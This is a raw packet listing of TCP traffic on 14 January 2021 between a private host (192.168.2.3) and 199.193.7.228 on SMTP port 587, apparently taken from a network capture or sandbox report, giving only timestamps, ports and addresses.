Jan 14, 2021 08:00:49.775460005 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.775592089 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.775645971 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.775681019 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.775724888 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.776019096 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.776046991 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.811280012 CET	49777	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.812585115 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.865257978 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.865297079 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.865402937 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.865447998 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.865483046 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.880579948 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.881328106 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.921016932 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.921094894 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.921120882 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.921169043 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.921430111 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.921444893 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.921521902 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.921528101 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.921562910 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.921616077 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.921629906 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.921684027 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.921812057 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.921875954 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.967636108 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.967885971 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.967915058 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:49.967982054 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.968061924 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:49.968395948 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.001553059 CET	587	49777	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.003098965 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.003232002 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.003288984 CET	587	49777	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.007961988 CET	49777	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.055286884 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.055310011 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.055325031 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.055413961 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.055452108 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.055470943 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.055488110 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.055567980 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.071134090 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.076221943 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.076261044 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.111481905 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.111601114 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.111731052 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.111840010 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.111855030 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.111885071 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.111898899 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.111923933 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.111949921 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.112117052 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.112201929 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.112242937 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.112267017 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.158493996 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.158523083 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.158648968 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.158791065 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.158838034 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.158941031 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.158953905 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.159163952 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.159254074 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.159272909 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.159286976 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.159344912 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.194633961 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.195271015 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.245373964 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.245482922 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.245492935 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.245584965 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.245636940 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.245680094 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.245711088 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.245748043 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.245811939 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.245826960 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.245829105 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.245872974 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.245994091 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.246112108 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.246228933 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.246340036 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.246439934 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.246556044 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.246658087 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.246871948 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.246880054 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.246993065 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.247088909 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.247198105 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.247344971 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.247612953 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.266195059 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.266231060 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.302083015 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.302231073 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.302253962 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.302273035 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.302304983 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.302325010 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.302521944 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.302741051 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.302844048 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.349010944 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.349116087 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.349145889 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.349210024 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.349210978 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.349230051 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.349287033 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.349555016 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.349574089 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.349589109 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.349642038 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.349668026 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.349831104 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.349948883 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.385373116 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.385718107 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.386029959 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.435396910 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.435436010 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.435451984 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.435750008 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.435770988 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.435816050 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.435894012 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.435973883 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.436014891 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.436062098 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.436094046 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.436213970 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.436295033 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.436368942 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.436661005 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.436733007 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.436815023 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.437015057 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.437345028 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.449434042 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.492580891 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.492607117 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.492703915 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.492799044 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.492974997 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.493010044 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.493093014 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.493143082 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.493177891 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.493232965 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.493369102 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.493427992 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.498142958 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.539586067 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.539624929 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.539745092 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.540895939 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.540925026 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.540939093 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.540957928 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.540977001 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.541003942 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.541057110 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.541074038 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.576061964 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.576666117 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.683923960 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.683959961 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.683975935 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.683993101 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.684004068 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.684087038 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.684238911 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.684293032 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.684361935 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.684376001 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.684422970 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.684633970 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.730082035 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.730282068 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.730300903 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.730384111 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.731312037 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.731359005 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.731415987 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.731440067 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.731441021 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.731503010 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.731762886 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.731828928 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.770245075 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.770282030 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.770409107 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.772650957 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.773595095 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.874685049 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.874722004 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.874736071 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.874778986 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.874795914 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.874825954 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.874890089 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.874912977 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.875031948 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.875226974 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.921498060 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.921526909 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.921663046 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.921679020 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.921721935 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.921853065 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.921896935 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.921927929 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.921943903 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.922101021 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.922175884 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.922244072 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:50.963721037 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.963845015 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.964704990 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:50.965133905 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.065309048 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.065330982 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.065459013 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.065474987 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.065522909 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.065535069 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.065548897 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.065551043 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.065606117 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.065826893 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.065994978 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.112798929 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.112814903 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.112826109 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.112838030 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.112848997 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.112859964 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.112936974 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.112987995 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.113177061 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.114495993 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.159816027 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.161015034 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.161544085 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.261038065 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.261075020 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.261246920 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.261300087 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.261318922 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.261487007 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.261857033 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.304661989 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.304713964 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.304802895 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.304831028 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.304841042 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.304900885 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.305071115 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.305188894 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.352977037 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.355083942 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.355689049 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.404642105 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.404745102 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.451818943 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.451968908 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.452083111 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.452650070 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.452780962 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.452928066 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.453099012 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.453123093 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.495146990 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.495274067 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.495296001 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.495311975 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.495390892 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.495399952 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.495443106 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.495476007 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.495501041 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.495520115 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.495716095 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.495784044 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.495804071 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.546941996 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.547508001 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.557905912 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.642393112 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.643049955 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.643177986 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.643228054 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.643282890 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.643369913 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.643440962 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.643460035 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.643515110 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.643522978 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.643599987 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.643654108 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.644224882 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.688611031 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.688646078 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.688656092 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.688673973 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.688688993 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.688703060 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.688719034 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.691502094 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.691566944 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.691589117 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.750765085 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.768749952 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.769404888 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.833662987 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.833700895 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.833825111 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.833832979 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.833908081 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.833960056 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.834125996 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.834217072 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.834259033 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.834619999 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.836291075 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.882011890 CET	587	49778	199.193.7.228	192.168.2.3
